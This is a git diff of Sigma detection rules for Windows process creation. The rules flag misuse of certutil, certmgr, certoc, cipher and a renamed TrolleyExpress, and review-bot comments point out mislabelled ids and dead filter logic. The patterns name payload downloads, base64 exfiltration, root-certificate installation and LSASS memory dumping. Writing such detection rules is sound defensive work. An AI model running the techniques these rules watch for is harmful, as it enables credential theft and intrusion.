( selection_2 and not filter_main_known_locations )) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml b/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml index 2393f2a32..3c339c4e2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certmgr_certificate_installation.yml 
@@ -1,18 +1,14 @@ title: New Root Certificate Installed Via CertMgr.EXE id: ff992eac-6449-4c60-8c1d-91c9722a1d48 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certmgr" with the "add" flag in order to install - a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md - https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/ @@ -25,19 +21,19 @@ logsource: category: process_creation product: windows detection: + # Example: CertMgr.exe /add CertificateFileName.cer /s /r localMachine root /all process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \CertMgr.exe - - OriginalFileName: CERTMGT.EXE + - NewProcessName|endswith: \CertMgr.exe + - OriginalFileName: CERTMGT.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /add - root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml index b18f0d73e..0d5f33a5e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_download.yml @@ -1,8 +1,8 @@ title: File Download via CertOC.EXE id: 70ad0861-d1fe-491c-a45f-fa48148a300d related: - - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a - type: similar + - id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a + type: similar status: test description: Detects when a user downloads a file by using CertOC.exe references: @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - -GetCACAPS - http condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml index 0be9505b3..5018f6afa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_download_direct_ip.yml @@ -1,8 +1,8 @@ title: File Download From IP Based URL Via CertOC.EXE id: b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a related: - - id: 70ad0861-d1fe-491c-a45f-fa48148a300d - type: similar + - id: 70ad0861-d1fe-491c-a45f-fa48148a300d + type: similar status: experimental description: Detects when a user downloads a file from an IP based URL using CertOC.exe references: 
@@ -21,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_ip: - CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} + CommandLine|re: ://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} selection_cli: - CommandLine|contains: -GetCACAPS + CommandLine|contains: -GetCACAPS condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml index 9cdb842f0..4c950a553 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll.yml @@ -1,11 +1,10 @@ title: DLL Loaded via CertOC.EXE id: 242301bc-f92f-4476-8718-78004a6efd9f related: - - id: 84232095-ecca-4015-b0d7-7726507ee793 - type: similar + - id: 84232095-ecca-4015-b0d7-7726507ee793 + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to loads - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -24,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' condition: process_creation and (all of selection_*) 
diff --git a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml index b0551af76..6e87dc062 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml @@ -1,11 +1,10 @@ title: Suspicious DLL Loaded via CertOC.EXE id: 84232095-ecca-4015-b0d7-7726507ee793 related: - - id: 242301bc-f92f-4476-8718-78004a6efd9f - type: similar + - id: 242301bc-f92f-4476-8718-78004a6efd9f + type: similar status: test -description: Detects when a user installs certificates by using CertOC.exe to load - the target DLL file. +description: Detects when a user installs certificates by using CertOC.exe to load the target DLL file. references: - https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-fe98e74189873d6df72a15df2eaa0315c59ba9cdaca93ecd68afc4ea09194ef2 @@ -23,14 +22,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certoc.exe - - OriginalFileName: CertOC.exe + - NewProcessName|endswith: \certoc.exe + - OriginalFileName: CertOC.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -LoadDLL ' - ' /LoadDLL ' selection_paths: - CommandLine|contains: + CommandLine|contains: - \Appdata\Local\Temp\ - \Desktop\ - \Downloads\ diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml index aec7d8f6d..6a713c6ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_certificate_installation.yml 
@@ -1,18 +1,14 @@ title: New Root Certificate Installed Via Certutil.EXE id: d2125259-ddea-4c1c-9c22-977eb5b29cf0 related: - - id: 42821614-9264-4761-acfc-5772c3286f76 - type: derived - - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc - type: obsoletes + - id: 42821614-9264-4761-acfc-5772c3286f76 + type: derived + - id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc + type: obsoletes status: test -description: 'Detects execution of "certutil" with the "addstore" flag in order to - install a new certificate on the system. - - Adversaries may install a root certificate on a compromised system to avoid warnings - when connecting to adversary controlled web servers. - - ' +description: | + Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. + Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st 
@@ -24,21 +20,21 @@ logsource: category: process_creation product: windows detection: + # Example: certutil -addstore -f -user ROOT CertificateFileName.der process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli_add: - CommandLine|contains: + CommandLine|contains: - /addstore - -addstore selection_cli_store: - CommandLine|contains: root + CommandLine|contains: root condition: process_creation and (all of selection_*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml index 364aa2d78..c73420a3b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_decode.yml @@ -1,9 +1,7 @@ title: File Decoded From Base64/Hex Via Certutil.EXE id: cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 status: test -description: Detects the execution of certutil with either the "decode" or "decodehex" - flags to decode base64 or hex encoded files. This can be abused by attackers to - decode an encoded payload before execution +description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ 
@@ -24,12 +22,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: + # Decode Base64 - '-decode ' - '/decode ' + # Decode Hex - '-decodehex ' - '/decodehex ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml index edbc726eb..1a02b1fc0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_download.yml @@ -1,19 +1,17 @@ title: Suspicious Download Via Certutil.EXE id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b related: - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files. +description: Detects the execution of certutil with certain flags that allow the utility to download files. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ - https://twitter.com/egre55/status/1087685529016193025 - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 tags: - attack.defense_evasion 
@@ -26,14 +24,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml index 111412c98..b3e24ab7a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_download_direct_ip.yml @@ -1,13 +1,12 @@ title: Suspicious File Downloaded From Direct IP Via Certutil.EXE id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download + type: similar status: test -description: Detects the execution of certutil with certain flags that allow the utility - to download files from direct IPs. +description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ 
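Review bot: The annotation `# Direct IP download` added to the related entry for 19b08b1c-861d-4e75-a1ef-ea0c1baf202b in the header hunk of proc_creation_win_certutil_download_direct_ip.yml is wrong: that id belongs to the generic "Suspicious Download Via Certutil.EXE" rule (its header is in the preceding hunk), and this file is itself the direct-IP rule. Change it to `- id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Generic download`. The same pair is swapped in the header hunk of proc_creation_win_certutil_download_file_sharing_domains.yml, where 19b08b1c should read `# Generic download` and 13e6fe51-d478-4c7e-b0f2-6da9b400a829 should read `# Direct IP download`.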
@@ -28,14 +27,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -45,8 +44,31 @@ detection: - ://7 - ://8 - ://9 + # filter_local_ips: + # # Note: Uncomment this filter if you want to exclude local IPs + # CommandLine|contains: + # - '://10.' # 10.0.0.0/8 + # - '://192.168.' # 192.168.0.0/16 + # - '://172.16.' # 172.16.0.0/12 + # - '://172.17.' + # - '://172.18.' + # - '://172.19.' + # - '://172.20.' + # - '://172.21.' + # - '://172.22.' + # - '://172.23.' + # - '://172.24.' + # - '://172.25.' + # - '://172.26.' + # - '://172.27.' + # - '://172.28.' + # - '://172.29.' + # - '://172.30.' + # - '://172.31.' + # - '://127.' # 127.0.0.0/8 + # - '://169.254.' # 169.254.0.0/16 filter_main_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml index 1bca87a29..e6741f9e3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml 
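Review bot: The commented-out `filter_local_ips` block will have no effect if a user uncomments it as its note instructs, because the condition on the new side only applies `not 1 of filter_main_*` and the name lacks the `filter_main_` prefix. Rename it `# filter_main_local_ips:` (or widen the condition to `not 1 of filter_*`) so the documented opt-in actually works. The enclosing detection block starts outside the hunk.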
@@ -1,13 +1,12 @@ title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 related: - - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b - type: similar - - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 - type: similar + - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download + type: similar + - id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829 # Generic download + type: similar status: experimental -description: Detects the execution of certutil with certain flags that allow the utility - to download files from file-sharing websites. +description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://forensicitguy.github.io/agenttesla-vba-certutil-download/ @@ -28,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - 'urlcache ' - 'verifyctl ' selection_http: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml index dff06146c..3d00e22c3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_encode.yml 
@@ -1,14 +1,12 @@ title: File Encoded To Base64 Via Certutil.EXE id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a status: test -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64. This can be abused by threat actors and attackers for data exfiltration +description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/ - https://lolbas-project.github.io/lolbas/Binaries/Certutil/ -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2019/02/24 modified: 2023/02/15 tags: @@ -22,15 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode condition: process_creation and (all of selection_*) falsepositives: - - As this is a general purpose rule, legitimate usage of the encode functionality - will trigger some false positives. Apply additional filters accordingly + - As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml index e43f1f98e..d931774f6 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml @@ -1,11 +1,10 @@ title: Suspicious File Encoded To Base64 Via Certutil.EXE id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the extensions of the file is suspicious +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -24,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: - .acl - .bat - .doc diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml index 3c69e02b7..4ed3e45c9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_encode_susp_location.yml 
@@ -1,11 +1,10 @@ title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 related: - - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a - type: derived + - id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a + type: derived status: experimental -description: Detects the execution of certutil with the "encode" flag to encode a - file to base64 where the files are located in potentially suspicious locations +description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations references: - https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior @@ -24,14 +23,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - -encode - /encode selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more suspicious locations to increase coverage - \AppData\Roaming\ - \Desktop\ - \Local\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml index ca6ac96a9..f2b4f8078 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_export_pfx.yml 
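Review bot: The new comment `# Note: Add more suspicious locations to increase coverage` sits under a selection named `selection_extension`, which actually holds path fragments (`\AppData\Roaming\`, `\Desktop\`, `\Local\Temp\`); the name looks copied from the sibling rule proc_creation_win_certutil_encode_susp_extensions.yml. Renaming it to `selection_location:` keeps `all of selection_*` working and makes the comment match the selection it annotates. The condition line is outside the hunk.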
@@ -1,12 +1,10 @@ title: Certificate Exported Via Certutil.EXE id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 status: test -description: Detects the execution of the certutil with the "exportPFX" flag which - allows the utility to export certificates. +description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. references: - https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html -author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/02/15 modified: 2023/02/20 tags: @@ -20,15 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-exportPFX ' - '/exportPFX ' condition: process_creation and (all of selection_*) falsepositives: - - There legitimate reasons to export certificates. Investigate the activity to - determine if it's benign + - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml index c3f20590a..173d11efb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_certutil_ntlm_coercion.yml 
@@ -18,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' -syncwithWU ' - ' \\\\' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml b/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml index 12a91d66b..264af0a1d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml +++ b/sigma/builtin/process_creation/proc_creation_win_chcp_codepage_switch.yml @@ -1,8 +1,7 @@ title: Suspicious CodePage Switch Via CHCP id: c7942406-33dd-4377-a564-0f62db0593a3 status: test -description: Detects a code page switch in command line or batch scripts to a rare - language +description: Detects a code page switch in command line or batch scripts to a rare language references: - https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers - https://twitter.com/cglyer/status/1183756892952248325 @@ -20,15 +19,18 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: - - ' 936' - - ' 1258' - NewProcessName|endswith: \chcp.com + CommandLine|endswith: + - ' 936' # Chinese + # - ' 1256' # Arabic + - ' 1258' # Vietnamese + # - ' 855' # Russian + # - ' 866' # Russian + # - ' 864' # Arabic + NewProcessName|endswith: \chcp.com condition: process_creation and selection fields: - ParentCommandLine falsepositives: - - Administrative activity (adjust code pages according to your organization's - region) + - Administrative activity (adjust code pages according to your organization's region) level: medium ruletype: Sigma 
diff --git a/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml b/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml index 8ee532c4d..b7fc71e23 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml @@ -1,16 +1,10 @@ title: Deleted Data Overwritten Via Cipher.EXE id: 4b046706-5789-4673-b111-66f25fe99534 status: test -description: 'Detects usage of the "cipher" built-in utility in order to overwrite - deleted data from disk. - - Adversaries may destroy data and files on specific systems or in large numbers - on a network to interrupt availability to systems, services, and network resources. - - Data destruction is likely to render stored data irrecoverable by forensic techniques - through overwriting files or data on local and remote drives - - ' +description: | + Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. + Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. + Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive author: frack113 @@ -27,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: CIPHER.EXE - - NewProcessName|endswith: \cipher.exe + - OriginalFileName: CIPHER.EXE + - NewProcessName|endswith: \cipher.exe selection_cli: - CommandLine|contains: ' /w:' + CommandLine|contains: ' /w:' condition: process_creation and (all of selection_*) falsepositives: - Unknown 
diff --git a/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml b/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml index a4f5be0e3..83d6ce167 100644 --- a/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml @@ -1,8 +1,7 @@ title: Process Access via TrolleyExpress Exclusion id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 status: test -description: Detects a possible process memory dump that uses the white-listed Citrix - TrolleyExpress.exe filename as a way to dump the lsass process memory +description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory references: - https://twitter.com/_xpn_/status/1491557187168178176 - https://www.youtube.com/watch?v=Ie831jF0bb0 @@ -22,20 +21,22 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter - \TrolleyExpress 7 - \TrolleyExpress 8 - \TrolleyExpress 9 - \TrolleyExpress.exe 7 - \TrolleyExpress.exe 8 - \TrolleyExpress.exe 9 + # Common dumpers - '\TrolleyExpress.exe -ma ' renamed: - NewProcessName|endswith: \TrolleyExpress.exe + NewProcessName|endswith: \TrolleyExpress.exe filter_renamed: OriginalFileName|contains: CtxInstall filter_empty: - OriginalFileName: null + OriginalFileName: condition: process_creation and (selection or ( renamed and not 1 of filter* )) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml b/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml index 0a5f9c680..3ce9ac1fe 100644 --- a/sigma/builtin/process_creation/proc_creation_win_clip_execution.yml 
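Review bot: The `renamed` branch of `condition: process_creation and (selection or ( renamed and not 1 of filter* ))` looks dead on this log source: `filter_empty` now matches when `OriginalFileName` is null, and Security 4688 events do not, as far as I know, carry that field at all, so `filter_empty` is always true and only the `selection` command-line patterns can ever fire. Either drop the renamed/filter logic from the builtin variant or mark it, e.g. `# Note: OriginalFileName is absent in 4688 events, so the rename check below is effectively disabled`. The new PID comment also overstates what the patterns do: `\TrolleyExpress 7` is a `contains` match and fires on any PID beginning with 7, 8 or 9 (7000 as much as 700), so `# We assume the lsass PID begins with 7, 8 or 9 and is passed as the only parameter` would be the accurate wording.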
